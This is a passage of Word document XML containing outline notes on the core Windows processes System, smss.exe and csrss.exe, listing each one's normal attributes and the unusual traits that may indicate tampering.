      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB45BE" w14:textId="19467F2B" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>PID for System process is always 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408959A1" w14:textId="3298AE13" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>home to special thread that runs only in kernel mode a kernel-mode system thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265AD6D6" w14:textId="550E824A" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>executing code in system space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A94553" w14:textId="54854ACA" w:rsidR="00834657" w:rsidRPr="0084205E" w:rsidRDefault="00834657" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allocated dynamic storage from OS memory heaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189319A7" w14:textId="409F2775" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B989D3" w14:textId="0FA7E335" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image Path: N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C42C84" w14:textId="2EB871C3" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F121EC" w14:textId="63A63DC1" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BFBD6" w14:textId="3467CE0B" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58497A" w14:textId="25D292E3" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: At boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59DDBE" w14:textId="76402E24" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Hacker will show different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17370D0C" w14:textId="074163E0" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image Path: C:\Windows\system32\ntoskrnl.exe (NT OS Kernel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A142F7" w14:textId="0B5FE48C" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: System Idle Process (0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF91D8" w14:textId="1D34E132" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0099E" w14:textId="0523A97F" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">parent process (aside from System Idle </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A239C" w14:textId="21FF2F95" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Multiple instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D11E46" w14:textId="43743830" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Different PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C6FCA" w14:textId="31D3BC73" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not running in Session 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F14DB0" w14:textId="795E2BE5" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>System &gt; smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6D68C" w14:textId="433BBC4F" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session Manager Subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3F305" w14:textId="6953427B" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Session Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A5900" w14:textId="07FE5FCC" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>creates new sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADB81A" w14:textId="714E2485" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>first user-mode process started by kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBFF38" w14:textId="182FBFF9" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>starts kernel mode and user mode of the Windows subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE4740B" w14:textId="27200F36" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>win32k.sys, winsrv.dll, csrss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4406B" w14:textId="2A93C909" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="006D489C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>csrss.exe and wininit.exe started in Session 0 – isolated Windows session for OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02941D70" w14:textId="5032178A" w:rsidR="006D489C" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>csrss.exe and winlogon.exe for Session 1 – user session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDEA2B" w14:textId="1E05320B" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Any other subsystem in Required value of HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\Control\Session Manager\Subsystems is launched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D9B73" w14:textId="11776DE4" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SMSS also creates environment variables, virtual memory paging files and starts winlogon.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF804C" w14:textId="139A130C" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9645D" w14:textId="3497C83C" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F"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System32\smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9675C" w14:textId="2B3E3120" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF59BE" w14:textId="55DE0F02" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: One master and child instance per session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2AC5F" w14:textId="6C9D324F" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659FE075" w14:textId="6E865008" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: Within seconds of master instance boot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B93B18" w14:textId="10208103" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A020C08" w14:textId="0B31E9B0" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Different parent process other than </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>System(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DEB5F2" w14:textId="0430C3F5" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image path is different than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDA478C" w14:textId="1B48E0D5" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>More than one running process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E60C31" w14:textId="0C22ADD9" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>User is not SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29740911" w14:textId="2A69874B" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unexpected registry entries for Subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D780D2E" w14:textId="5F8340BB" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CSRSS.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49574264" w14:textId="2D0935D8" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client Server Runtime Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55637B08" w14:textId="11A630A1" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>user-mode side of Windows subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4598B" w14:textId="34515D17" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>always running and critical to system operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D047D" w14:textId="65B139E2" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>responsible for Win32 console window and process thread creation/deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B06769B" w14:textId="35AAC015" w:rsidR="00DC5B2F" w:rsidRPr="0084205E" w:rsidRDefault="00DC5B2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>csrsrv.dll, basesrv.dll, winsrv.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297BFC4" w14:textId="220F390B" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
